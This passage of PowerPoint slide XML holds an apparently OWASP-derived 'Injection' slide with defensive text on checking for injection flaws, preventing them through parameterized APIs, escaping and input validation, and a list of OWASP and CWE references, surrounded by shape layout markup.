        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="35814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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Am I Vulnerable To Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The best way to find out if an application is vulnerable to injection is to verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> use of interpreters clearly separates untrusted data from the command or query. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many cases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, it is recommended to avoid the interpreter, or disable it (e.g., XXE), if possible. For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL calls, use bind variables in all prepared statements and stored procedures, or avoid dynamic queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Checking the code is a fast and accurate way to see if the application uses interpreters safely. Code analysis tools can help a security analyst find use of interpreters and trace data flow through the application. Penetration testers can validate these issues by crafting exploits that confirm the vulnerability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated dynamic scanning which exercises the application may provide insight into whether some exploitable injection flaws exist. Scanners cannot always reach interpreters and have difficulty detecting whether an attack was successful. Poor error handling makes injection flaws easier to discover.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Rectangle 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="347472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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>OWASP SQL Injection Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>OWASP Query Parameterization Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>OWASP Command Injection Article</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP XXE Prevention Cheat Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Chapter on SQL Injection Testing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>CWE Entry 77 on Command Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>CWE Entry 89 on SQL Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>CWE Entry 564 on Hibernate Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>CWE Entry 611 on Improper Restriction of XXE</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>CWE Entry </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>917 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>Expression Language Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Rectangle 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="35814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rgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How Do I Prevent Injection?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="500" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Preventing injection requires keeping untrusted data separate from commands and queries.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to use a safe API which avoids the use of the interpreter entirely or provides a parameterized interface.  Be careful with APIs, such as stored procedures, that are parameterized, but can still introduce injection under the hood.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If a parameterized API is not available, you should carefully escape special characters using the specific escape syntax for that interpreter. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>OWASP’s Java Encoder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and similar libraries provide such escaping routines.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Positive or “white list” input validation is also recommended, but is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a complete defense as many situations require special characters be allowed. If special characters are required, only approaches (1) and (2) above will make their use safe. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>OWASP’s ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> has an extensible library of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>white list input validation routines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="41" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="30"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="11" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="13" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="14" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="15" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
